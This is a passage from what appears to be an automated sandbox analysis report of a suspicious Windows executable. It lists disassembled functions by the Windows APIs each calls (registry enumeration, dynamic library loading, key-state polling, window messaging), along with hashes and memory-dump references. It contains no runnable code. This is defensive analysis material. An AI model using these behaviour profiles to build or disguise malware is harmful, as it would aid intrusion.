                                    • Instruction ID: 8f12b860aba91ad340ebd28387096e2bdf9d56bc8a8f3af91ad93c00b60fb762
                                    • Opcode Fuzzy Hash: 49467d0472a62102df20b405b0a8fd34f129aa45b5e728085c81a5411b1dbaa2
                                    • Instruction Fuzzy Hash: 93218371A0010DAFCB10EF64CC85DEE7BB8EF89714B004069F909EB252DB75EA45EB21
                                    Function 00F5A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F5A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F5A399
                                      • Part of subcall function 00F5A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A3AC
                                      • Part of subcall function 00F5A37C: GetCurrentThreadId.KERNEL32 ref: 00F5A3B3
                                      • Part of subcall function 00F5A37C: AttachThreadInput.USER32(00000000), ref: 00F5A3BA
                                    • GetFocus.USER32 ref: 00F5A554
                                      • Part of subcall function 00F5A3C5: GetParent.USER32(?), ref: 00F5A3D3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5A59D
                                    • EnumChildWindows.USER32(?,00F5A615), ref: 00F5A5C5
                                    • __swprintf.LIBCMT ref: 00F5A5DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                    • String ID: %s%d
                                    • API String ID: 1941087503-1110647743
                                    • Opcode ID: 2adccbcdf3e4f1a095c4e26ad477e38543669f0f699e1ce32d3ee7c830ed1894
                                    • Instruction ID: d933181f344db3b802f02dea06954f6c1847846a572988067142f27e60ccdb1f
                                    • Opcode Fuzzy Hash: 2adccbcdf3e4f1a095c4e26ad477e38543669f0f699e1ce32d3ee7c830ed1894
                                    • Instruction Fuzzy Hash: 0511D2716002086BDF10BF60DC85FEE3778AF48701F0041B5BE08AA092DA79596AAB32
                                    Function 00F62017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F62048
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    • Opcode ID: eed9719ebf5d50aee270fdfe432bb68bf88e43149fc01b4ac7fe00953ea3ddc1
                                    • Instruction ID: 4059a884a243e26bd8b9ec4df3679151f1178729ae68e3ad5bf5a0bb49062d95
                                    • Opcode Fuzzy Hash: eed9719ebf5d50aee270fdfe432bb68bf88e43149fc01b4ac7fe00953ea3ddc1
                                    • Instruction Fuzzy Hash: 0B115B31D0011AAFCF40EFA4D8914EEB7B4FF15304B5085A8D855A7293EB32690AEF90
                                    Function 00F78F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F8F910), ref: 00F7903D
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F8F910), ref: 00F79071
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F791EB
                                    • SysFreeString.OLEAUT32(?), ref: 00F79215
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 29762644c5f99ab0ffe30c3d4cc0f3253531908ed7c45d71b4614cdb307d86ac
                                    • Instruction ID: 463120b1fa6f29d10e605c8ca0cc0bb966c382c1e6cf786eaa33098b83761388
                                    • Opcode Fuzzy Hash: 29762644c5f99ab0ffe30c3d4cc0f3253531908ed7c45d71b4614cdb307d86ac
                                    • Instruction Fuzzy Hash: 0EF16C71A04109EFDF04DF94C888EAEB7B9FF48314F10805AF519AB291DBB1AE46DB51
                                    Function 00F7EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F7EF1B
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F7EF4B
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F7F07E
                                    • CloseHandle.KERNEL32(?), ref: 00F7F0FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: 37891e4bb9aa2bac222d9327574902045b6fc42ce70d20776d3558f0ff5b2826
                                    • Instruction ID: 23e83c05837381a02900a52f54e4fc161faf8078394ddb7a6e7840cafe21f03c
                                    • Opcode Fuzzy Hash: 37891e4bb9aa2bac222d9327574902045b6fc42ce70d20776d3558f0ff5b2826
                                    • Instruction Fuzzy Hash: 188171716047009FD720DF28CC46B6AB7E5AF48720F14881EF999DB2D2DBB4AC45AB52
                                    Function 00F802C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80388
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F803C7
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8040E
                                    • RegCloseKey.ADVAPI32(?,?), ref: 00F8043A
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80447
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    • Opcode ID: f5783a32607fa0d8b731dfb0549ffa8aebef7adabdf55dced4fe3e65ca8a17cc
                                    • Instruction ID: a91a8839a61f725371a8ae776b9346e3c8b9dd16bde6ec77620ed2ad109f0519
                                    • Opcode Fuzzy Hash: f5783a32607fa0d8b731dfb0549ffa8aebef7adabdf55dced4fe3e65ca8a17cc
                                    • Instruction Fuzzy Hash: E3515B31608204AFD704EF54CC81FAEB7E8FF88714F44892DB595872A2DB74E909EB52
                                    Function 00F7DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DC3B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F7DCBE
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F7DCDA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00F7DD1B
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F7DD35
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67B20,?,?,00000000), ref: 00F05B8C
                                      • Part of subcall function 00F05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67B20,?,?,00000000,?,?), ref: 00F05BB0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 3aee2a5095a3209e57b5518b56514d2f55fb73081d0af1b009cafb09ae697ee3
                                    • Instruction ID: 641a5fe7aa330c6d4a0f4d6652fa3382ca52a9e2ed7c30a307b8c029c65b6c00
                                    • Opcode Fuzzy Hash: 3aee2a5095a3209e57b5518b56514d2f55fb73081d0af1b009cafb09ae697ee3
                                    • Instruction Fuzzy Hash: BC514B35A00609DFDB11EF68C8849ADB7F4FF48320B54C06AE819AB362D774AD45EF51
                                    Function 00F6E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F6E88A
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F6E8B3
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F6E8F2
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F6E917
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F6E91F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    • Opcode ID: d5ec9fb9c1536787650588fabc26edcdcac5f8adf0f762797d13de4e223f31f7
                                    • Instruction ID: 714cfc179bad62a4c73718b42b34e6167da2bb452c8f00901dd090b7da0ee537
                                    • Opcode Fuzzy Hash: d5ec9fb9c1536787650588fabc26edcdcac5f8adf0f762797d13de4e223f31f7
                                    • Instruction Fuzzy Hash: 91510F35A00219DFCF01DF64C9859AEBBF5FF08310B148099E849AB3A2DB75ED15EB50
                                    Function 00F8A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d008b56cff2d0aae0fec9eddf0280c60a7f7c1e9a66c4abd5bad82ee59bf3839
                                    • Instruction ID: 4bd5866f7b480db4217c12c2ac0b95bfda605d3295cc8233a46cb1588f25af91
                                    • Opcode Fuzzy Hash: d008b56cff2d0aae0fec9eddf0280c60a7f7c1e9a66c4abd5bad82ee59bf3839
                                    • Instruction Fuzzy Hash: 7C41C135D00208AFEB20EB28CC48FE9BBA4EB09320F144166F955E72E1D771AD51FB51
                                    Function 00F02344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00F02357
                                    • ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                    • GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: dbd576ba378bd4d9c5b8ba63ba9db60c37cb3e9bac0a2e1d6875a74b578de120
                                    • Instruction ID: 7bcee8bd4fef7c0a513531a34f86d06e9653e64653b2cc46d4b33b11f2d7f974
                                    • Opcode Fuzzy Hash: dbd576ba378bd4d9c5b8ba63ba9db60c37cb3e9bac0a2e1d6875a74b578de120
                                    • Instruction Fuzzy Hash: D7415C31904119FBDF559FA8CC48AEABB74BB05330F20431AF828A62D0C7349954FBA1
                                    Function 00F56920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F5695D
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F569A9
                                    • TranslateMessage.USER32(?), ref: 00F569D2
                                    • DispatchMessageW.USER32(?), ref: 00F569DC
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F569EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    • Opcode ID: c46833edc059f5535a56d59904b0278bc262b219c2e7f294540ffed46a155fe5
                                    • Instruction ID: da30cc43241e274d23b7586c9ae91e20a1280039ecbf7c0e30013ef86bec9749
                                    • Opcode Fuzzy Hash: c46833edc059f5535a56d59904b0278bc262b219c2e7f294540ffed46a155fe5
                                    • Instruction Fuzzy Hash: 1731C47190824AAEDB208F74CC45FF6BBA8AB05326F544569EA31D30A1E735988DF790
                                    Function 00F58F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00F58F12
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F58FBC
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F58FC4
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F58FD2
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F58FDA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
                                    • Instruction ID: 0e7daf30ebd4916b8437b6accfca86c32b80649900aaea547c4a738cd0a46d75
                                    • Opcode Fuzzy Hash: 75b24ea03ce706897d724e4b253a60672f7761faa5c993b31a6e84d33624b443
                                    • Instruction Fuzzy Hash: 8C31D171900219EFDB00CF68DD4CAEE7BB6EB08326F104229FE25E61D1C7709918EB50
                                    Function 00F5B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 00F5B6C7
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F5B6E4
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F5B71C
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F5B742
                                    • _wcsstr.LIBCMT ref: 00F5B74C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: 12dd218b1cdb156016bf6aae13b08d3ddb9322ea05372dbf6e4a7dff1d0a9f70
                                    • Instruction ID: 99c96b225a4ba45af6372a74f23863710a2d2b84aa9fa980dc27ae2a9ad740c8
                                    • Opcode Fuzzy Hash: 12dd218b1cdb156016bf6aae13b08d3ddb9322ea05372dbf6e4a7dff1d0a9f70
                                    • Instruction Fuzzy Hash: 06210732604248BEEB255B39AC49E7B7B98EF89721F104079FD05CA1A1EF65CC44B3A0
                                    Function 00F8B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8B44C
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F8B471
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F8B489
                                    • GetSystemMetrics.USER32(00000004), ref: 00F8B4B2
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F71184,00000000), ref: 00F8B4D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: d732b27ec639106c615fa36a11d1572ad142977f47e95eae2ff84490f3275b10
                                    • Instruction ID: 6dca570c814763a563526cfa3335a5e0be40f2e097f10661f50ba253cb19994a
                                    • Opcode Fuzzy Hash: d732b27ec639106c615fa36a11d1572ad142977f47e95eae2ff84490f3275b10
                                    • Instruction Fuzzy Hash: CE216071914256AFCB10EF38CC09BAA3BA4FB05731B144729F926D71E2E7309855FB90
                                    Function 00F597E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F59802
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59834
                                    • __itow.LIBCMT ref: 00F5984C
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F59874
                                    • __itow.LIBCMT ref: 00F59885
                                    Memory Dump Source
